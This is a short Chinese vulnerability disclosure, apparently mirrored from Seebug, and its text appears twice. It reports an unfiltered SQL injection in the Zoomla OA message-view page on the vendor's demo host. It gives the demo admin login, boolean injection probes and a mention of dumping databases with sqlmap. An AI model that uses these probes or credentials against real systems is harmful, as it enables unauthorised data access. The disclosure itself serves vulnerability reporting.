VULHUB ™

### 简要描述： 这个能算通用吗。。 没什么技术含量 ### 详细说明： 官网演示地址：http://oa.zoomla.cn/ 使用admin admin888登陆 注入点http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 没有经过任何限制，直接可以注入 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=1返回正常 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=2 返回空白 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1' 报错 利用sqlmap可以跑 66个库 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png)

### 简要描述： 这个能算通用吗。。 没什么技术含量 ### 详细说明： 官网演示地址：http://oa.zoomla.cn/ 使用admin admin888登陆 注入点http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 没有经过任何限制，直接可以注入 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=1返回正常 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=2 返回空白 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1' 报错 利用sqlmap可以跑 66个库 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png)